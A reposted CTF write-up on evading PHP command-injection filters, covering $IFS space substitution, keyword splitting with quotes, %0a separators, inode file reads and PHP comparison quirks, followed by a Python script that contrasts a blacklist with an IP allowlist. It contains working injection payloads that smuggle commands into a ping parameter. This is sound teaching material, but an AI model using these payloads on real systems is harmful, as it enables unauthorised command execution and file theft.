
CTF PHP audit bypasses filtering learning from topics

2022-06-26 04:16:00 eliforsharon

Basic introduction

When a ping command is executed with user-controlled input, the first command can be terminated and a new command appended, which is then executed as well.
Command injection follows this principle.
Example: ip=127.0.0.1;ls

Space filtering

For command injection where spaces are filtered, ${IFS}, $IFS or $IFS$9 can be used to represent the delimiter. However, when $IFS is immediately followed by letters, the shell may parse the letters as part of a different variable name, so either use ${IFS}, which fixes the variable name, or $IFS$9, where the empty positional parameter $9 separates the variable from the letters that follow.

Filtering only keywords such as cat and flag

If characters such as " ' \ are not filtered,
the empty string "" can be used as a connector inside a keyword, or \ as an escape character within it, to split the keyword so that it no longer matches the filter.

Filtering connectors such as ; | &

On Linux, ; can be replaced with %0a (a URL-encoded newline).
Example: the ctfhub RCE comprehensive exercise filters the following characters:

preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/"

So the final payload is:

1%0acd$IFS$1f""lag_is_here%0aca""t$IFS$1f""lag_7548135816224.php
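As an added example (not part of the original post), the following Python script reproduces the ctfhub blacklist above and checks the two payloads discussed on this page against it and against a strict allowlist, showing why only the allowlist is an effective mitigation for a ping-style parameter. The sample inputs are constructed from the page; the function names are my own.

```python
import re
from ipaddress import ip_address
from urllib.parse import unquote

# The ctfhub blacklist from the exercise, translated from PCRE to Python re.
BLACKLIST = re.compile(r"(\||&|;| |/|cat|flag|ctfhub)")


def blacklist_allows(raw: str) -> bool:
    """Emulate the exercise's filter.

    The web server URL-decodes the parameter before PHP sees it, so %0a has
    already become a real newline by the time the regex runs.
    """
    return BLACKLIST.search(unquote(raw)) is None


def allowlist_allows(raw: str) -> bool:
    """Strict allowlist: the value must parse as a literal IP address.

    Anything else (newlines, quotes, $IFS, a second command) is rejected,
    regardless of which shell metacharacters a blacklist happens to know about.
    """
    try:
        ip_address(unquote(raw))
    except ValueError:
        return False
    return True


# Constructed inputs: one benign value and the two payloads quoted on this page.
SAMPLES = [
    "127.0.0.1",
    "127.0.0.1;ls",
    '1%0acd$IFS$1f""lag_is_here%0aca""t$IFS$1f""lag_7548135816224.php',
]


def compare(samples=SAMPLES) -> dict:
    """Return {input: (passes_blacklist, passes_allowlist)} for each sample."""
    return {s: (blacklist_allows(s), allowlist_allows(s)) for s in samples}


if __name__ == "__main__":
    for value, (bl, al) in compare().items():
        print(f"{value!r:70} blacklist={bl!s:5} allowlist={al}")
```

The newline payload passes the blacklist unchanged, because every listed token has been split by "" or replaced by $IFS / %0a, while the IP allowlist rejects both injected inputs.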

Filtering more/tail/less/cat and similar commands

Use the strings command instead.

$a == md5($a) bypass

The principle is to find a string beginning with 0e whose md5 value also begins with 0e followed only by digits; PHP's loose comparison then treats both sides as the number 0, so the comparison is true.
For example, 0e215962017.

Viewing a file through its inode

ls -i shows the inode number of a file.

The file can then be read with the command find -inum 1321734 | xargs cat.
xargs takes the output of the previous command and passes it as arguments to the command after the pipe.

Array strict comparison bypass

Array key overflow bug in PHP 5.5
Reference link
[0 => 0] === [0x100000000 => 0] evaluates to true

Original site

Copyright notice
This article was written by [eliforsharon]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/02/202202180536406757.html